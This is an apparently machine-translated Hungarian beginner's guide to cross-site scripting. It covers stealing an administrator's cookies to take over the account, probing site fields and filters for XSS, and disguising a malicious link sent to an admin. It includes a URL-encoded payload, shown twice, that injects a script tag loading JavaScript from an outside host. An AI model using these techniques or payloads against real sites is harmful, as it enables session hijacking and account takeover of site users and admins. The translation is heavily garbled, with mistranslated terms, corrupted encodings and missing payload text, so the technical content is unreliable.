Xss - kezdőknek
### Az XSS használata.
Először meg kell tudnunk, mi a süti.
Ha tudod, akkor ugorhatsz.
A cookie-kat a látogató számítógépén tárolják.
Ha a "blabluble" becenév alatt regisztrált a webhelyen, az oldal egy cookie-kkal rendelkező fájlt mentett el a számítógépen, ahol az adatok kódoltak.
És ha Ön a rendszergazda, és rendelkezik hozzáféréssel az oldalon, és én - a felhasználó, aki lopott tőled (a rendszergazda) a cookie-kat, akkor azt nyugodtan menjen a helyszínre, és a helyszínen azt azonosítja, mint „admin” - Azt rendszergazdai jogokkal rendelkezik.
Az ellopott (helyettesítő lopott) szakács cseréje javasoljuk, hogy használja az IE vagy a beépített funkciók CookieEdit használatát az Opera és a Firefox alkalmazásban.
### Mi az XSS támadás?
Az XSS támadások olyan támadások, amelyek nem a webhelyen, hanem a webhelyen használók.
Az XSS egy hiba a szűrőben, alkalmazásban.
Vannak passzív XSS és aktív XSS.
Mi a passzív XSS?
Aktív - ez az XSS, amely nem igényel semmilyen további lépést az áldozatról - elegendő csak az oldal XSS megnyitásával és a Java kód automatikus végrehajtása.
Automatizálásuknak köszönhetően nagyon hasznosak és értékesek.
Például az aktív xss a BB tagekben létezik, mert nem elegendő a szűrés, amikor üzenetet hagy a fórumon # 092, 092. vendég, egy csevegés, amely minden egyes frissítéskor mindig aktív lesz.
### Szóval, pontosan arra fogok menni, hogyan találom meg az XSS-t ezen az oldalon.
Honnan tudja, hogy az XSS egy adott webhelyen megy keresztül?
Szörnyű freakiness típusú
Ezt a szkriptet próbáljuk beilleszteni a különböző területekre. Ha megjelenik egy üzenet, a szkript feldolgozása és végrehajtása megtörtént.
A leggyakoribb XSS (minden olyan helyen megfigyelhető, ahol rossz szűrés történt):
Az egész pont ">.
Gondoljunk arra, hogy mit csinálunk, ha belépünk a mezőbe ">. mi történik?
Bemutatjuk a formát
egy változóhoz tartozik egy érték a mezőhöz. A változó feldolgozásra kerül, "> végrehajtja, lezárja
szkript és letöltés
Ez az XSS a legnépszerűbb a keresőmotorokban:
Megvizsgáljuk a webhely összes mezőjét, és megpróbáljuk beilleszteni
Ha üzenetet kap, megtalálta az XSS-t.
### És hogyan kell meghatározni, van-e szűrő, vagy sem?
Csak bármely mezőben írja be: ''; # 33; - "<########>=
Ezután nyissa meg a html oldalt, és keresse meg a "########" szót
és nézze meg a későbbi ..
Ha a <> így továbbra is ez a sebezhetőség első jele: ez azt jelenti, hogy a szűrőnek lyuk van.
Ha a karakterek megegyeznek a megadott értékekkel - ez a sérülékenység második jele - lehetséges további karakterek a későbbi XSS támadáshoz.
Ezután, ha megnyitotta a HTML-t, akkor nem találta meg <> akkor valószínűleg egy lyuk a szűrőben.
Ha megnyitja a HTML-t, megtalálja azt <> más szimbólumokkal helyettesítve, akkor ez egy bummer - egy szűrő a
normálisan működik.
A szűrés ellenőrzéséhez a következőket is megadhatja: "><>"" ", / # 092 ;? @%
Vegye figyelembe az esetet, ha a szűrő eszik <>
Ebben az esetben van egy lyuk valószínűsége.
Például egy szűrőnek enyhülnie kell
- 2) Ezt még mindig megteheti:
ez a módszer megbízhatóbb.
% 68% 74% 74% 70% 3A% 2F% 2F% 2A% 2A% 2A% 2A% 2A% 2E% 72% 75% 2F% június 6% 72% 65% 65% 3F% 70% 3D% 27% 3E% 3C% 73% 63% 72% 69% 70% 74% 20% 73% 72% 63% 3D% 68% 74% 74% 70% 3A% 2F% 2F% 68% 61% 6B% 6E% 65% 74% 2E% 68% 31% 36% 2E% 72% 75% 2F% 73% 63% 72% 69% 70% 74% 2F% 6A% március 7% 2E% 6A% 73% 3E% 3C% 2F% 73 % 63% 72% 69% 70% 74% 3E
kódolt volt:
- 3) Különösen a titkosítás nem csak a szűrők megtévesztésére, hanem az ADMIN megtévesztésére is szükség van a PASSIVE CSU használatakor.
Mit kér a dokumentum.location.href? )). ez a Java kód, amely kérés nélkül megy a megadott webhelyre, így azt választja, adtuk a linket az adminhoz, és elment a webhelyünkre, ez az, amit csináltunk. Gyorsan dobja
% 68% 74% 74% 70% 3A% 2F% 2F% 2A% 2A% 2A% 2A% 2A% 2E% 72% 75% 2F% június 6% 72% 65% 65% 3F% 70% 3D% 27% 3E% 3C% 73% 63% 72% 69% 70% 74% 20% 73% 72% 63% 3D% 68% 74% 74% 70% 3A% 2F% 2F% 68% 61% 6B% 6E% 65% 74% 2E% 68% 31% 36% 2E% 72% 75% 2F% 73% 63% 72% 69% 70% 74% 2F% 6A% március 7% 2E% 6A% 73% 3E% 3C% 2F% 73 % 63% 72% 69% 70% 74% 3E
és ez már a mi Xss titkosított formában.
Megjegyzés: ez csak akkor működik, ha az Xss a webhely rendszergazdájához tartozik, ahová a linket eldobta.